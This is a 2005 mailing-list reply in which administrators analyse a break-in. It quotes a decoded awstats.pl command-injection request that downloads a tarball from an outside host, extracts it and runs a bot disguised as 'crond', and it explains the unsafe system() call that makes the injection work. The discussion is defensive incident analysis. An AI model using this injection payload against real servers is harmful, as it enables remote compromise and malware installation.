Re: Security Breach

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



David Cary Hart wrote:
On Fri, 2005-03-04 at 17:58 +0000, Paul Howarth wrote:
Replace the url-encoded characters and you get:

/cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv mech crond;export PATH=;crond;echo e_exp;%00

So the attacker has tricked the script into executing a set of shell commands, which include changing directory to /tmp, downloading a tarball from a Romanian site, extracting that tarball and then executing a program from the downloaded and extracted tarball, after renaming it to "crond" in an effort to disguise it.

I got that part. What I am trying to understand (please bear with me) is how the attacker might have modified the script command line.

It is enough if the script does something as stupid as:

system("cat $configdir/somefile")

(Assuming value of configdir is stored in $configdir variable).

What gets executed is:

cat |echo ; echo b_exp; [...]; echo e_exp;%00/somefile

The last part will produce an error, most likely, but who cares, the important part was already executed...

It is classic example of command injection. Most of exploits of that type are for SQL queries. This one is for shell.

--
Aleksandar Milivojevic <amilivojevic@xxxxxx>    Pollard Banknote Limited
Systems Administrator                           1499 Buffalo Place
Tel: (204) 474-2323 ext 276                     Winnipeg, MB  R3T 1L7


[Index of Archives]     [Current Fedora Users]     [Fedora Desktop]     [Fedora SELinux]     [Yosemite News]     [Yosemite Photos]     [KDE Users]     [Fedora Tools]     [Fedora Docs]

  Powered by Linux